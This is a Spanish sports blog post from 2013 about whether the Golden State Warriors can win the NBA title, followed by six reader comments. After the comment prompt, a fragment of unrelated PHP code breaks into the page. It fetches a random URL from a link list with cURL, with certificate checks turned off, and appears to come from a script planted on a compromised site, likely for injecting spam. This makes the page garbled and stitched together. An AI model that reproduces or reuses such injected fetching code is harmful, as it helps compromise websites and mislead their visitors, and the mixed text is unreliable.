Golden State Warriors: ¿Aspirantes al anillo?

27 de October de 2013 por Sancho88

Esa es la pregunta que se hacen muchos expertos en la NBA pero la respuesta es muy complicada de resolver. El instinto nos empuja a descartar esa idea de entrada pero los resultados del equipo el año pasado y, sobre todo, las gratas sensaciones que nos dejaron en los Playoffs contra los Nuggets y los Spurs hacen cuestionarnos si los Curry, Lee y compañía tienen opciones reales de ganar el campeonato. Y es que los Warriors cuentan con el mejor quinteto del Oeste tras el fichaje de Andre Iguodala, pero como ocurre con el buen cristal de bohemia la fragilidad de salud de algunos de sus principales jugadores puede ser la propia tumba del equipo. Si uno o varios de estos 6 jugadores hace crack, las aspiraciones de todo el vestuario se pueden ir por el desagüe de una Conferencia Oeste que no permitirá ningún despiste esta temporada. 

Sobre todo porque es difícil combinar a jugadores de la talla de Curry, Bogut o Lee con otros como Douglas, Speights o Jermaine O’Neal y pensar que puedan suplirlos con garantías si los primeros, como es de esperar, se pierden más de 20 partidos por lesiones esta temporada. Ese es el gran riesgo de un grupo de 6 hombres impecables al que quizá le falte fondo de armario. Decimos quizá porque se pudo ver en las ligas de verano que hay material suficiente entre los jóvenes del equipo para poder vislumbrar un salto cualitativo de esa segunda unidad. Jugadores como Kent Bazemore o Draymond Green nos sorprendieron muy positivamente en Las Vegas alzándose como campeones, y no sería de extrañar que, a pesar de su escaso nombre y bagaje en la liga, acabasen siendo fundamentales en la rotación de Mark Jackson.

Como decimos, en el quinteto titular tienen estos Warriors su arma secreta. En un cara a cara prácticamente ningún equipo de la NBA puede superar al cinco inicial que forman Curry, Thompson, Iguodala, Lee y Bogut, más Barnes de sexto hombre. Te van a matar desde el triple con la mejor combinación de exteriores en un backourt de la historia, la que forman Stephen Curry y Klay Thompson, en defensa te maniatarán también estos mismos jugadores desde el perímetro, Andre Iguodala hará de todo y lo hará bien, David Lee anotará lo que le apetezca y Andrew Bogut sellará la pintura. Y por si no fuera suficiente Harrison Barnes aparecerá como 3-4 para aportar más defensa, más físico y más definición en ataque.

Si por un lado la salud de estos jugadores es su principal hándicap, por el otro su versatilidad es su gran arma. En el quinteto, todos menos Bogut pueden doblar posición y las posibilidades para Mark Jackson se multiplican automáticamente. Puede jugar con Toney Douglas de 2 acompañando a Curry, con Iguodala triplicando posición y organizando el ataque del equipo cuando Curry no juegue, con Harrison Barnes haciendo de pegamento para cualquier emergencia y David Lee igual. Las posibilidades son infinitas. Ya lo vimos en las eliminatorias del año pasado y este año será muy parecido. Incluso Draymond Green dobla posición y Marrese Speights también puede hacerlo. Versatilidad es sinónimo de Warriors.

En las oficinas han estado impecables para preparar un camino hacia el anillo. No les salió  el Bogut+Barnes por Howard cuando firmaron a Iguodala, pero es que tal vez era demasiado bonito para ser verdad. Pero por lo demás consiguieron quitarse a las rémoras de Biedrins y Jefferson, y aunque han perdido primeras rondas en próximas temporadas, no parece que necesiten la suerte del draft para seguir creciendo. Compraron la última elección de primera ronda a los Suns y parece que acertaron por lo que se pudo ver de Nemanja Nedovic en el pasado Eurobasket. El serbio tiene que mejorar muchas cosas, sobre todo su regularidad y constancia, pero como suelen decir, el talento no se enseña y él lo tiene a raudales. Veremos qué puede hacer desde la segunda línea. Y para redondear un verano perfecto, Andrew Bogut acaba de extender su contrato por 3 años y 36 millones de dólares. Parece una apuesta arriesgada por su historial de lesiones, pero ya sabemos a cómo está el kilo de center.

En definitiva, las dudas que se ciernen sobre estos Warriors son relativas a las lesiones y sobre si las bajas de Jarret Jack y Carl Landry son de algún modo reemplazables. Está claro que la apuesta por Iguodala marcará el camino de los Warriors. El banquillo será muy importante y si todos pueden estar sanos volverán a pelear por jugar las finales de conferencia. El problema es que hay equipos de temporada regular y otros de playoffs y los Warriors parecen un claro ejemplo de lo primero, como los Nuggets del año pasado. En Playoffs les faltarán recursos para parar a las grandes estrellas de los rivales, sobre todo si la sobrecarga de partidos neutraliza a los delicados Curry, Lee y Bogut. Por lo demás, seguramente nos ofrezcan una temporada regular brillante. Disfrutaremos de ellos, pero tras el análisis es imposible pensar que van a ser campeones. Aunque nunca se sabe con estos chicos. El año pasado ya desmontaron nuestro análisis optimista. Este año les pondremos la barrera un poquito más lejos, a ver de lo que son capaces.

Quinteto: Stephen Curry, Klay Thompson, Andre Iguodala, David Lee, Andrew Bogut
Sexto hombre: Harrison Barnes

Altas: Andre Iguodala (Denver Nuggets), Marreese Speights (Cleveland Cavaliers), Toney Douglas (Sacramento Kings), Jermaine O’Neal (Phoenix Suns), Nemanja Nedovic (Lietuvos Rytas).
Bajas: Andris Biedrins (Utah Jazz), Richard Jefferson (Utah Jazz), Brandon Rush (Utah Jazz), Jarret Jack (Cleveland Cavaliers), Carl Landry (Sacramento Kings)

Pronóstico: 4º en el Oeste (50-32). Semifinales de Conferencia.

Comenta

6 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    A mí no me parece que los Warriors sean un equipo sólo de temporada regular,se cargaron tranquilamente a los Nuggets e hicieron sufrir a los Spurs “del casi anillo”,sin tener al equipo al 100%.Otra cosa es que la mayoría de jugadores no tienen demasiada experiencia en PO.

    No sé,yo soy muy poco objetivo con ellos,tanto que estoy pensando en apostar por ellos -de hecho estuve a punto el año pasado cuando se pagaba 52 a 1 su título-.A mí el banquillo me da confianza,evidentemente una baja de Curry es diíficl de compensar pero hay muchos tios ahí que son muy intensos.Además el ambiente del Oracle también cuenta….particularmente espero grandes resultados de ellos y porque no,que se postulen como el candidato del oeste.Les doy ganadores de su división y finalistas.

      Citar

  2. Ruxixón dice:
    #2

    Finalistas de conferencia,y en una situación ideal llegan a la final de la NBA.

      Citar

  3. Denise dice:
    #3

    Para mi son el mejor equipo de la NBA. La única duda que tengo es la inexperiencia de la mayoría del bloque que no se como responderán en citas decisivas, pero no llegar a Finales de Conferencia me parecería una mala temporada.
    No comparto la idea de que les falte fondo de armario ó que echen de menos a Jack y Landry. Este equipo es infinitamnete superior al del año pasado que ya era muy bueno, y aun muchisimo mas profundo.
    Speights me parece mejor jugador que Landry, y entre Douglas más Iggy que puede jugar de todo, suplirán bastante bien a Jack. Después Barnes es un figura aunque la llegada de Iggy puede hacerle perder peso en el equipo pero confío en la inteligencia de Marc Jackson.
    Por ultimo, en el banquillo, la tripleta de jovenes como Bazemore, Ezeli y Green me parecen muy interesantes. Dada la calidad de los titulares, no van a disfrutar de excesivos minutos, pero en caso de lesiones, éstos tios pueden suplir a los titulares con plena garantía.
    Lo dicho, en todas mis apuestas, los estoy metiendo en la final de la NBA contra Indiana.

      Citar

  4. Chipi dice:
    #4

    Yo también. Warrios Vs Pacers sería la final más bonita y más merecida por el trabajo bien hecho en años.

    Me parecen mucho más interesantes unos Warrios con Iguodala que con Howard pero sin Barnes ni Bogut. Para mí es el fichaje del año y sigue siendo el equipo más divertido de ver.

    Tampoco he sido nunca muy objetivo con los de la bahía, por supuesto.

      Citar

  5. GreenPride dice:
    #5

    El equipo del año para mi si la salud les acompaña. Ya les dan como el equipo más entretenido para ver y yo no puedo estar más de acuerdo. Si Curry, Lee y Bogut están sanos la mayor parte de la temporada y llegan en forma a los PO tienen de todo para llegar a las finales. Debe ser el año en el que Curry entre definitivamente entre los mejores anotadores y escoltas de la liga. Desde él tienen un equipo temible por fuera con consumados tiradores y con fieros interiores como Lee y Bogut y un alero capaz de hacer de todo y servir de pegamento como Iggy. Además por lo visto de Green, Bazemore y Ezeli los tres deberían tener minutos y servir de descanso a los titulares. El único pero es que echarán algo en flata a Jack y su liderazgo en partidos comprometidos pero ese carisma debe darlo Iguodala y el paso adelante de Curry.
    Yo les veo preparados y si la salud no lo impide creo que lucharán duramente en PO y que en el actual Oeste sin un favorito definido tienen serias opciones.

      Citar

  6. Luis H. dice:
    #6

    El año pasado sobrevivieron en playoffs con Bogut entrando en ritmo y sin David Lee, que se iba a doble-doble partido tras partido. Si la salud les respeta, Jackson le encuentra unos 30 min por partido a Barnes y le motiva para que siga aportando y los hombres del 7 al 10 aportan su parte, estamos ante un posible campeón, ¿por qué no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>